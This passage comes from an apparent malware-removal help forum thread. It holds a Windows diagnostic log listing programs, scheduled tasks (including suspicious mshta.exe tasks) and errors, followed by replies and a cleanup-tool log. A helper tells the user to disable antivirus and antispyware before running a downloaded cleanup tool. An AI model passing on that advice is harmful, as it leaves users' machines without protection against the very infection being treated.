Update for Microsoft Filter Pack 2.0 (KB2878281) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{302A8FE3-EBF5-486C-A431-16A1CD914443}) (Version: - Microsoft)
Update for Microsoft InfoPath 2010 (KB2817369) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{4EEA3D3E-989C-4DF4-AB0A-3042C0C12AA3}) (Version: - Microsoft)
Update for Microsoft Office 2010 (KB2589298) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DADF7E25-FFA4-4D02-BE84-1DAE62C18516}) (Version: - Microsoft)
Update for Microsoft Office 2010 (KB2589352) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.SingleImage_{F4284D93-7AE8-4309-8CF3-9AD394F35F3A}) (Version: - Microsoft)
Update for Microsoft Office 2010 (KB2589352) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{F4284D93-7AE8-4309-8CF3-9AD394F35F3A}) (Version: - Microsoft)
Update for Microsoft Office 2010 (KB2589375) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{287A1E92-9E41-4BC1-8920-B3D0E9220800}) (Version: - Microsoft)
Update for Microsoft Office 2010 (KB2597087) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{9D69691D-823D-4C3E-9B12-563A3F520366}) (Version: - Microsoft)
Update for Microsoft Office 2010 (KB2760598) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.SingleImage_{ECFE33A3-B8B7-439A-ADE4-59FBD29EF9B8}) (Version: - Microsoft)
Update for Microsoft Office 2010 (KB2760598) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{ECFE33A3-B8B7-439A-ADE4-59FBD29EF9B8}) (Version: - Microsoft)
Update for Microsoft Office 2010 (KB2760631) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{35698CB7-AAA2-4577-B505-DBFF504AEF23}) (Version: - Microsoft)
Update for Microsoft Office 2010 (KB2794737) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{5AA578BB-759C-40FD-9661-A737C0884541}) (Version: - Microsoft)
Update for Microsoft Office 2010 (KB2825635) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{F1A20C69-9FE5-40FD-9CD5-84EABC2EF64A}) (Version: - Microsoft)
Update for Microsoft Office 2010 (KB2850079) 32-Bit Edition (HKLM-x32\...\{90140000-001F-040C-0000-0000000FF1CE}_Office14.SingleImage_{82F87E28-B18E-46D6-A399-E2F19CF5949B}) (Version: - Microsoft)
Update for Microsoft Office 2010 (KB2850079) 32-Bit Edition (HKLM-x32\...\{90140000-001F-0C0A-0000-0000000FF1CE}_Office14.SingleImage_{5E8EB600-8B94-429E-873E-98369C6DC1BC}) (Version: - Microsoft)
Update for Microsoft Office 2010 (KB2878225) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{EFF5EBA3-40AD-4859-85E7-3C1CF4F297EB}) (Version: - Microsoft)
Update for Microsoft OneNote 2010 (KB2837595) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.SingleImage_{51CCA922-A0CC-47C4-8910-6936D97CAC2E}) (Version: - Microsoft)
Update for Microsoft OneNote 2010 (KB2837595) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{51CCA922-A0CC-47C4-8910-6936D97CAC2E}) (Version: - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0409-0000-0000000FF1CE}_Office14.SingleImage_{DCE104A1-1875-4469-A83D-A5BFA6C4640F}) (Version: - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{2AB483F1-C86E-427A-83B4-23889B03512D}) (Version: - Microsoft)
Update for Microsoft PowerPoint 2010 (KB2837579) 32-Bit Edition (HKLM-x32\...\{90140000-0018-0409-0000-0000000FF1CE}_Office14.SingleImage_{334AA0A1-2BB1-4D74-B66A-2B2C4D9C2C87}) (Version: - Microsoft)
Update for Microsoft PowerPoint 2010 (KB2837579) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{2BA40F82-F3A4-441C-BF1A-ED4C42FF4872}) (Version: - Microsoft)
Update for Microsoft SharePoint Workspace 2010 (KB2760601) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.SingleImage_{F9F5A080-AF38-4966-9A6B-C43DCA465035}) (Version: - Microsoft)
Update for Microsoft Visio 2010 (KB2880526) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{7B29D8B8-6A87-496C-A65E-B935E740448A}) (Version: - Microsoft)
Update for Microsoft Visio Viewer 2010 (KB2837587) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{38CF30E4-3348-4BD1-A859-B630C355A56F}) (Version: - Microsoft)
Update Installer for WildTangent Games App (x32 Version: - WildTangent) Hidden
VIP Access SDK (1.0.1.2) (HKLM-x32\...\VIP Access SDK) (Version: 1.0.1.2 - Symantec Inc.)
Virtual Villagers 4 - The Tree of Life (x32 Version: 2.2.0.98 - WildTangent) Hidden
VLC media player 2.1.3 (HKLM-x32\...\VLC media player) (Version: 2.1.3 - VideoLAN)
VpnOneClick (HKCU\...\6a4f81584d46feb3) (Version: 2.3.9.10 - VpnOneClick)
WildTangent Games App (HP Games) (x32 Version: 4.0.5.32 - WildTangent) Hidden
Windows Live Communications Platform (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3538.0513 - Microsoft Corporation)
Windows Live Essentials (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live ID Sign-in Assistant (Version: 7.250.4232.0 - Microsoft Corporation) Hidden
Windows Live Installer (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Language Selector (Version: 15.4.3538.0513 - Microsoft Corporation) Hidden
Windows Live Mail (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Mesh (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
Windows Live Messenger (x32 Version: 15.4.3538.0513 - Microsoft Corporation) Hidden
Windows Live MIME IFilter (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Movie Maker (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Photo Common (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Photo Gallery (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live PIMT Platform (x32 Version: 15.4.3508.1109 - Microsoft Corporation) Hidden
Windows Live Remote Client (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Windows Live Remote Client Resources (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Windows Live Remote Service (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Windows Live Remote Service Resources (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Windows Live SOXE (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live SOXE Definitions (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live UX Platform (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live UX Platform Language Pack (x32 Version: 15.4.3508.1109 - Microsoft Corporation) Hidden
Windows Live Writer (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Writer Resources (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
WinZip 18.0 (HKLM\...\{CD95F661-A5C4-44F5-A6AA-ECDD91C240DF}) (Version: 18.0.10661 - WinZip Computing, S.L. )
YouSendIt Plug-In for Outlook (x32 Version: - ) Hidden
Zuma's Revenge (x32 Version: 2.2.0.98 - WildTangent) Hidden

==================== Restore Points =========================

==================== Hosts content: ==========================

2009-07-14 10:34 - 2009-06-11 05:00 - 00000824 ____N C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

Task: {0BC47493-9044-4208-8D56-E79AFA28D193} - System32\Tasks\HPCeeScheduleForHewlett Packard => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2011-07-15] (Hewlett-Packard)
Task: {0D5F8DC5-7B10-44FE-BF06-5E6CB3BD3639} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2012-09-27] (Hewlett-Packard Company)
Task: {24A569F0-C89C-42EB-8A9B-ED2D095B6E8F} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe [2013-12-12] (Hewlett-Packard Company)
Task: {2D233B3A-9565-419E-BAA5-FC82DD7D73BA} - System32\Tasks\MirageAgent => C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe [2011-10-07] (CyberLink)
Task: {3F472961-8E96-4E06-AB15-D2875171A4B0} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2012-09-27] (Hewlett-Packard Company)
Task: {5C427928-2DBF-4DB6-BC4B-D81E18244C5D} - System32\Tasks\Norton Management\Norton Error Analyzer => C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\SymErr.exe [2012-10-19] (Symantec Corporation)
Task: {5D268E52-B1CA-4604-9F59-448A8349C952} - System32\Tasks\Microsoft\Windows\WindowsBackup\AutomaticBackup => Rundll32.exe /d sdengin2.dll,ExecuteScheduledBackup
Task: {5EB0EBB2-B4A4-42DE-8A40-DC3FC390D9A4} - System32\Tasks\{CA822321-983A-4340-9CB3-CB2EE057A063} => C:\Program Files (x86)\SMART BRO\UIMain.exe [2012-10-24] ()
Task: {6CCBD1A5-72D6-4F21-90F8-EC0CCE477AF9} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-11-25] (Google Inc.)
Task: {6D3585A5-7643-4399-8C31-001B06B882F6} - System32\Tasks\Norton Internet Security\Norton Error Analyzer => C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\SymErr.exe [2014-01-31] (Symantec Corporation)
Task: {80FF5E38-29BA-41C6-9240-E3503A706ACE} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\WSCStub.exe [2014-05-11] (Symantec Corporation)
Task: {8E5081FD-C7AF-43EA-BB90-C7422385FE64} - System32\Tasks\Norton Internet Security\Norton Error Processor => C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\SymErr.exe [2014-01-31] (Symantec Corporation)
Task: {91741919-2D0D-413D-A95B-C1516057287A} - System32\Tasks\RegWrite => C:\Windows\system32\mshta.exe [2013-11-25] (Microsoft Corporation)
Task: {9524787C-EB4C-46E6-B4F3-6829050DE3A8} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Tuneup => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2012-09-27] (Hewlett-Packard Company)
Task: {967EC23D-B54A-4298-9611-D184AD06BA4B} - System32\Tasks\{EB48E1FA-5693-49CC-8BA6-47A279DDDC5E} => C:\Program Files (x86)\SMART BRO\UIMain.exe [2012-10-24] ()
Task: {A82378E6-04E3-4F38-BCA8-39F6BC165FD4} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-11-25] (Google Inc.)
Task: {B72BA812-3D71-42DC-B88C-23AC148870EB} - System32\Tasks\Norton Management\Norton Error Processor => C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\SymErr.exe [2012-10-19] (Symantec Corporation)
Task: {DFC2EB88-5E5C-424C-AAC9-D7BBE1774D96} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-05-27] (Adobe Systems Incorporated)
Task: {FB46FC93-DE80-4001-9037-B2BBF269182D} - System32\Tasks\SystemBoot => C:\Windows\system32\mshta.exe [2013-11-25] (Microsoft Corporation)
Task: {FB9404FE-77D7-4352-8C2A-32EECA95E013} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-05-20] (Piriform Ltd)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\HPCeeScheduleForHewlett Packard.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe

==================== Loaded Modules (whitelisted) =============

2013-06-07 14:17 - 2012-10-24 14:38 - 00274760 _____ () C:\Program Files (x86)\SMART BRO\AssistantServices.exe
2011-09-01 19:13 - 2011-09-01 19:13 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2011-10-01 02:40 - 2011-10-01 02:40 - 00107320 _____ () C:\Program Files\Hewlett-Packard\HP LaunchBox\HPTaskBar1.exe
2013-06-07 14:17 - 2012-05-11 09:41 - 00156448 _____ () C:\Program Files (x86)\SMART BRO\UIExec.exe
2014-04-15 03:41 - 2014-04-15 03:41 - 00039192 _____ () C:\Program Files\CCleaner\branding.dll
2014-06-04 17:33 - 2014-06-04 17:33 - 00043008 _____ () C:\Users\Hewlett Packard\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpa1ew1g.dll
2013-08-24 03:01 - 2013-08-24 03:01 - 25100288 _____ () C:\Users\Hewlett Packard\AppData\Roaming\Dropbox\bin\libcef.dll
2014-02-14 15:13 - 2014-02-14 15:13 - 00172544 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_32\IsdiInterop\db0cab2acf56035b3c1dfbb0a78a7dc7\IsdiInterop.ni.dll
2012-04-06 01:45 - 2011-08-24 12:37 - 00059904 _____ () C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IsdiInterop.dll
2014-05-23 12:48 - 2014-05-14 07:40 - 00716616 _____ () C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.114\libglesv2.dll
2014-05-23 12:48 - 2014-05-14 07:40 - 00126280 _____ () C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.114\libegl.dll
2014-05-23 12:48 - 2014-05-14 07:40 - 04217672 _____ () C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.114\pdf.dll
2014-05-23 12:48 - 2014-05-14 07:40 - 00414536 _____ () C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.114\ppGoogleNaClPluginChrome.dll
2014-05-23 12:48 - 2014-05-14 07:40 - 01732424 _____ () C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.114\ffmpegsumo.dll

==================== Alternate Data Streams (whitelisted) =========

==================== Safe Mode (whitelisted) ===================

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\91966428.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\91966428.sys => ""="Driver"

==================== EXE Association (whitelisted) =============

==================== Disabled items from MSCONFIG ==============

==================== Faulty Device Manager Devices =============

==================== Event log errors: =========================

Application errors:
==================
Error: (06/04/2014 05:33:55 PM) (Source: Windows Search Service) (EventID: 7010) (User: )
Description: The index cannot be initialized.

Details:
The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)

Error: (06/04/2014 05:33:55 PM) (Source: Windows Search Service) (EventID: 3058) (User: )
Description: The application cannot be initialized.

Context: Windows Application

Details:
The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)

Error: (06/04/2014 05:33:55 PM) (Source: Windows Search Service) (EventID: 3028) (User: )
Description: The gatherer object cannot be initialized.

Context: Windows Application, SystemIndex Catalog

Details:
The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)

Error: (06/04/2014 05:33:55 PM) (Source: Windows Search Service) (EventID: 3029) (User: )
Description: The plug-in in <Search.TripoliIndexer> cannot be initialized.

Context: Windows Application, SystemIndex Catalog

Details:
Element not found. (HRESULT : 0x80070490) (0x80070490)

Error: (06/04/2014 05:33:55 PM) (Source: Windows Search Service) (EventID: 3029) (User: )
Description: The plug-in in <Search.JetPropStore> cannot be initialized.

Context: Windows Application, SystemIndex Catalog

Details:
The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)

Error: (06/04/2014 05:33:55 PM) (Source: Windows Search Service) (EventID: 9002) (User: )
Description: The Windows Search Service cannot load the property store information.

Context: Windows Application, SystemIndex Catalog

Details:
The content index database is corrupt. (HRESULT : 0xc0041800) (0xc0041800)

Error: (06/04/2014 05:33:55 PM) (Source: Windows Search Service) (EventID: 7042) (User: )
Description: The Windows Search Service is being stopped because there is a problem with the indexer: The catalog is corrupt.

Details:
The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)

Error: (06/04/2014 05:33:55 PM) (Source: Windows Search Service) (EventID: 7040) (User: )
Description: The search service has detected corrupted data files in the index {id=4700}. The service will attempt to automatically correct this problem by rebuilding the index.

Details:
The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)

Error: (06/04/2014 05:33:55 PM) (Source: Windows Search Service) (EventID: 9000) (User: )
Description: The Windows Search Service cannot open the Jet property store.

Details:
0x%08x (0xc0041800 - The content index database is corrupt. (HRESULT : 0xc0041800))

Error: (06/04/2014 05:33:55 PM) (Source: ESENT) (EventID: 455) (User: )
Description: Windows (1568) Windows: Error -1811 occurred while opening logfile C:\ProgramData\Microsoft\Search\Data\Applications\Windows\MSS0035F.log.

System errors:
=============
Error: (06/04/2014 05:33:55 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Search service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 30000 milliseconds: Restart the service.

Error: (06/04/2014 05:33:55 PM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: The Windows Search service terminated with service-specific error %%-1073473535.

Error: (06/04/2014 05:33:28 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load: 
cdrom

Microsoft Office Sessions:
=========================
Error: (06/04/2014 05:33:55 PM) (Source: Windows Search Service) (EventID: 7010) (User: )
Description: 
Details:
The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)

Error: (06/04/2014 05:33:55 PM) (Source: Windows Search Service) (EventID: 3058) (User: )
Description: Context: Windows Application

Details:
The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)

Error: (06/04/2014 05:33:55 PM) (Source: Windows Search Service) (EventID: 3028) (User: )
Description: Context: Windows Application, SystemIndex Catalog

Details:
The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)

Error: (06/04/2014 05:33:55 PM) (Source: Windows Search Service) (EventID: 3029) (User: )
Description: Context: Windows Application, SystemIndex Catalog

Details:
Element not found. (HRESULT : 0x80070490) (0x80070490)
Search.TripoliIndexer

Error: (06/04/2014 05:33:55 PM) (Source: Windows Search Service) (EventID: 3029) (User: )
Description: Context: Windows Application, SystemIndex Catalog

Details:
The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)
Search.JetPropStore

Error: (06/04/2014 05:33:55 PM) (Source: Windows Search Service) (EventID: 9002) (User: )
Description: Context: Windows Application, SystemIndex Catalog

Details:
The content index database is corrupt. (HRESULT : 0xc0041800) (0xc0041800)

Error: (06/04/2014 05:33:55 PM) (Source: Windows Search Service) (EventID: 7042) (User: )
Description: 
Details:
The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)
The catalog is corrupt

Error: (06/04/2014 05:33:55 PM) (Source: Windows Search Service) (EventID: 7040) (User: )
Description: 
Details:
The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)
4700

Error: (06/04/2014 05:33:55 PM) (Source: Windows Search Service) (EventID: 9000) (User: )
Description: 
Details:
0x%08x (0xc0041800 - The content index database is corrupt. (HRESULT : 0xc0041800))

Error: (06/04/2014 05:33:55 PM) (Source: ESENT) (EventID: 455) (User: )
Description: Windows1568Windows: C:\ProgramData\Microsoft\Search\Data\Applications\Windows\MSS0035F.log-1811

==================== Memory info ===========================

Percentage of memory in use: 47%
Total physical RAM: 4041.43 MB
Available physical RAM: 2103.3 MB
Total Pagefile: 8081.05 MB
Available Pagefile: 6069.06 MB
Total Virtual: 8192 MB
Available Virtual: 8191.86 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:97.21 GB) (Free:12.79 GB) NTFS ==>[System with boot components (obtained from reading drive)]
Drive d: (Recovery) (Fixed) (Total:17.74 GB) (Free:1.94 GB) NTFS ==>[System with boot components (obtained from reading drive)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 119 GB) (Disk ID: 782B1BF2)
Partition 1: (Active) - (Size=199 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=97 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=18 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=4 GB) - (Type=OF Extended)

==================== End Of Log ============================


----------



## raphael100 (May 24, 2014)

These scans were performed on battery power without pop-ups present. Thanks!


----------



## emeraldnzl (Nov 3, 2007)

Hmm... I wonder if you modem/router is infected.

Try turning off your router. Unplugging it from the wall socket, wait at least 30 secs and then replug and restart.

See if that resets it and if there is any difference in the pops ups.

Tell me how you get on.


----------



## raphael100 (May 24, 2014)

I will try that now. Another thing that I discovered is that if the pop-ups are NOT there, my search engines on both IE and Chrome do not work.


----------



## raphael100 (May 24, 2014)

I tried unplugging router and modem for a few minutes. The pop-ups are exactly the same when I reconnected. The only thing that makes the pop-ups disappear (even the ones already on screen) is unplugging my computer form mains power. Working on battery power the pop-ups disappear, but my search engines in both IE and Chrome become unusable. Plug power lead back in and the pop-ups come back and the search engines work again.


----------



## emeraldnzl (Nov 3, 2007)

> but my search engines in both IE and Chrome become unusable


That suggests to me that the problem is related to your browsers and we have missed something there.

It won't be caused by your power.

You ran ComboFix early on. Let's have a look at what it did. Maybe that will give us a clue.

Go to *Start* and type *Combofix.txt* in the box *Search programs and files*.

Open Combofix.tx and copy and paste the contents of the text file back here.

Note: ComboFix.txt are numbered so if there was more than one run for instance you might find C:\ComboFix2.txt. etc.


----------



## raphael100 (May 24, 2014)

I know it sounds strange but the only thing that makes the pop-ups consistently disappear is unplugging the power lead. My battery is at 100%. The pop-ups never appear when the power lead in detached. I agree it seems to be related to the browsers, but the power lead thing is also very real. A combination of the 2?


----------



## raphael100 (May 24, 2014)

I do not remember running ComboFix. I have searched for the logs but they are not there. Shall I run that now?


----------



## emeraldnzl (Nov 3, 2007)

> I know it sounds strange but the only thing that makes the pop-ups consistently disappear is unplugging the power lead. My battery is at 100%. The pop-ups never appear when the power lead in detached. I agree it seems to be related to the browsers, but the power lead thing is also very real. A combination of the 2?


In a way yes, in that your browsers don't appear to work with the power lead disconnected. I am thinking that it is because the browsers are not working that you are not getting the pop ups.

A solution might be to uninstall your browsers making sure you remove all user settings/application data and then reinstalling a new "vanilla" copy of the browser.

It might not be too if there is an active malicious file somewhere that we have missed. Hence my interest in the ComboFix log.

*Let's do this:*

Please delete your version of ComboFix, including the folders *C:\Qoobox* and *C:\Combofix* if they are there, and download a new version of Combofix.

Download ComboFix from one of this location:

*Link*

** IMPORTANT !!! Save ComboFix.exe to your Desktop*

*Disable your AntiVirus and AntiSpyware applications, usually via a right click on the System Tray icon. They may otherwise interfere with our tools.*


Double click on ComboFix.exe & follow the prompts.

Your desktop may go blank. This is normal.

ComboFix may reboot your machine. This is normal too. 

***Note: Do not mouseclick combo-fix's window while it's running. That may cause it to stall***

When finished, it will produce a log for you. Please include the *C:\ComboFix.txt* in your next reply.


----------



## raphael100 (May 24, 2014)

I have been observing this for a few days now. The winning combination to get the popups to start appearing is power cable attached AND IE open. They will then continue to appear even after IE is closed (upon exit my CCleaner automatically cleans IE). The popups disappear if I detach the power cable. Then they do not reappear until I plug the cable in again.


----------



## raphael100 (May 24, 2014)

ComboFix 14-05-26.02 - Hewlett Packard 05/27/2014 12:38:32.1.4 - x64
Microsoft Windows 7 Home Premium 6.1.7601.1.1252.63.1033.18.4041.2516 [GMT 8:00]
Running from: c:\users\Hewlett Packard\Desktop\username123.exe
AV: Norton Internet Security *Disabled/Updated* {D87FA2C0-F526-77B1-D6EC-0EDF3936CEDB}
FW: Norton Internet Security *Disabled* {E04423E5-BF49-76E9-FDB3-A7EAC7E589A0}
SP: Norton Internet Security *Disabled/Updated* {631E4324-D31C-783F-EC5C-35AD42B18466}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
((((((((((((((((((((((((( Files Created from 2014-04-27 to 2014-05-27 )))))))))))))))))))))))))))))))
.
.
2014-05-27 04:47 . 2014-05-27 04:47	--------	d-----w-	c:\users\hedev\AppData\Local\temp
2014-05-27 04:47 . 2014-05-27 04:47	--------	d-----w-	c:\users\Default\AppData\Local\temp
2014-05-25 10:58 . 2014-04-02 03:18	144664	----a-w-	c:\windows\SysWow64\secman.dll
2014-05-25 10:46 . 2014-04-11 08:39	206080	----a-w-	c:\windows\system32\drivers\ssudmdm.sys
2014-05-25 10:46 . 2014-04-11 08:39	110336	----a-w-	c:\windows\system32\drivers\ssudbus.sys
2014-05-24 22:57 . 2010-08-30 00:34	536576	----a-w-	c:\windows\SysWow64\sqlite3.dll
2014-05-24 22:57 . 2014-05-27 04:24	--------	d-----w-	C:\AdwCleaner
2014-05-24 22:56 . 2014-05-24 23:50	--------	d-----w-	C:\FRST
2014-05-24 21:46 . 2014-05-27 01:29	--------	d-----w-	C:\NPE
2014-05-24 21:44 . 2014-05-27 01:31	--------	d-----w-	c:\users\Hewlett Packard\AppData\Local\NPE
2014-05-24 06:02 . 2014-05-24 06:02	--------	d-----w-	c:\programdata\Yahoo! Companion
2014-05-21 00:30 . 2014-05-21 00:30	--------	d-----w-	c:\users\Hewlett Packard\AppData\Roaming\Blue Jeans
2014-05-16 19:14 . 2014-05-06 04:40	23544320	----a-w-	c:\windows\system32\mshtml.dll
2014-05-16 19:14 . 2014-05-06 03:00	84992	----a-w-	c:\windows\system32\mshtmled.dll
2014-05-16 19:14 . 2014-05-06 04:17	2724864	----a-w-	c:\windows\system32\mshtml.tlb
2014-05-16 19:14 . 2014-05-06 03:07	2724864	----a-w-	c:\windows\SysWow64\mshtml.tlb
2014-05-16 01:57 . 2014-05-16 15:12	--------	d-----w-	c:\windows\system32\drivers\NISx64\1503000.00C
2014-05-09 07:35 . 2014-05-09 07:35	--------	d-----w-	c:\users\Hewlett Packard\AppData\Roaming\Oracle
2014-05-07 01:22 . 2014-05-16 19:31	--------	d-s---w-	c:\windows\system32\CompatTel
2014-05-07 01:22 . 2014-05-07 01:22	--------	d-----w-	c:\users\Hewlett Packard\AppData\Roaming\DropboxMaster
2014-05-05 08:50 . 2014-05-05 08:52	--------	d-----w-	c:\program files (x86)\DVRClient Plug-in
2014-04-29 02:29 . 2014-05-20 01:28	--------	d-----w-	c:\users\Public\Util
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-05-26 16:17 . 2013-05-31 05:28	692400	----a-w-	c:\windows\SysWow64\FlashPlayerApp.exe
2014-05-26 16:17 . 2011-11-09 23:56	70832	----a-w-	c:\windows\SysWow64\FlashPlayerCPLApp.cpl
2014-05-16 19:03 . 2013-05-08 03:23	93223848	----a-w-	c:\windows\system32\MRT.exe
2014-04-14 18:34 . 2014-04-14 18:34	1070232	----a-w-	c:\windows\SysWow64\MSCOMCTL.OCX
2014-04-14 12:13 . 2013-10-22 02:11	96168	----a-w-	c:\windows\SysWow64\WindowsAccessBridge-32.dll
2014-03-06 09:31 . 2014-04-12 19:00	4096	----a-w-	c:\windows\system32\ieetwcollectorres.dll
2014-03-06 08:59 . 2014-04-12 19:00	66048	----a-w-	c:\windows\system32\iesetup.dll
2014-03-06 08:57 . 2014-04-12 19:00	548352	----a-w-	c:\windows\system32\vbscript.dll
2014-03-06 08:57 . 2014-04-12 19:00	48640	----a-w-	c:\windows\system32\ieetwproxystub.dll
2014-03-06 08:53 . 2014-04-12 19:00	2767360	----a-w-	c:\windows\system32\iertutil.dll
2014-03-06 08:40 . 2014-04-12 19:00	51200	----a-w-	c:\windows\system32\jsproxy.dll
